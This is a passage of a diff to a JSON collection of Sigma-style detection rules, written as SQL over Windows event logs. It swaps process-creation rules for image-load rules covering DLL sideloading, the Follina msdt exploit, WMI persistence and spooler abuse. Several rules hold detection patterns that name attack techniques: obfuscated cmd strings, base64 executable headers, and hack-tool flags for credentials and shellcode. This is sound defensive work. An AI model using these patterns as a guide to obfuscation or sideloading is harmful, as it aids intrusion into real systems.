'%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { 
- "title": "HackTool - SharpLDAPmonitor Execution", - "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", - "status": "experimental", - "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "status": "test", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.discovery" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" + "filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Potential Dosfuscation Activity", - "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", - "status": "experimental", - "description": "Detects possible payload obfuscation via the commandline", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "status": "test", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + 
"author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_dosfuscation.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine 
LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", + "title": "Python Py2Exe Image Load", + "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "author": "Patrick St. 
John, OTR (Open Threat Research)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.t1027.002" ], "falsepositives": [ - "Unknown" + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Description = 'Python Core' AND NOT ((NewProcessName LIKE '%Python%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "image_load_susp_python_image_load.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Spooler Service Suspicious Binary Load", + "id": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", + "status": "experimental", + "description": "Detect DLL Load from Spooler Service backup folder", + "author": "FPT.EagleEye, Thomas Patzke (improvements)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218.011" + 
"attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Loading of legitimate driver" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "image_load_spoolsv_dll_load.yml" }, { - "title": "Group Membership Reconnaissance Via Whoami.EXE", - "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", + "title": "Suspicious WSMAN Provider Image Loads", + "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "status": "experimental", - "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE 
'\\'))" + "SELECT * FROM logs WHERE (((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" ], - "filename": "proc_creation_win_whoami_groups_discovery.yml" + "filename": "image_load_wsman_provider_image_load.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "title": "WMI ActiveScriptEventConsumers 
Activity Via Scrcons.EXE DLL Load", + "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", - "author": "Florian Roth (Nextron Systems)", + "description": 
"Detects WMI command line event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) 
